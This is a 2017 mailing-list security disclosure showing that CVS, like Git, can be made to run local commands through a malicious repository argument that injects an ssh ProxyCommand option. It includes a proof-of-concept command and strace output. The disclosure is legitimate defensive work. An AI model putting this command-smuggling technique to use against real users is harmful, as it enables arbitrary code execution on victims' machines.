[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CVS and ssh command injection (see CVE-2017-1000117, etc.)

From: Hank Leininger
Subject: CVS and ssh command injection (see CVE-2017-1000117, etc.)
Date: Thu, 10 Aug 2017 22:19:26 -0600

Bugs in Git, Subversion, and Mercurial were just announced & patched
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as starting with - to pass options to
the ssh client:

  git clone ssh://-oProxyCommand=some-command...

CVS has a similar problem with the -d option:

  $ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 
| egrep [^pu]id
  execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", 
"co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
  [pid 20003] execve("/usr/local/bin/ssh", ["ssh", 
"-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = 
-1 ENOENT (No such file or directory)
  [pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", 
"cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
  [pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 
0x32af5f10d0 /* 141 vars */) = 0
  [pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
  ssh_exchange_identification: Connection closed by remote host

Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.

Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.

See also:




Hank Leininger <hlein@korelogic.com>
5F6D DCC8 FF53 8093 EC39  127B 091E 7F7C E898 E86C

Attachment: signature.asc
Description: Digital signature

reply via email to

[Prev in Thread] Current Thread [Next in Thread]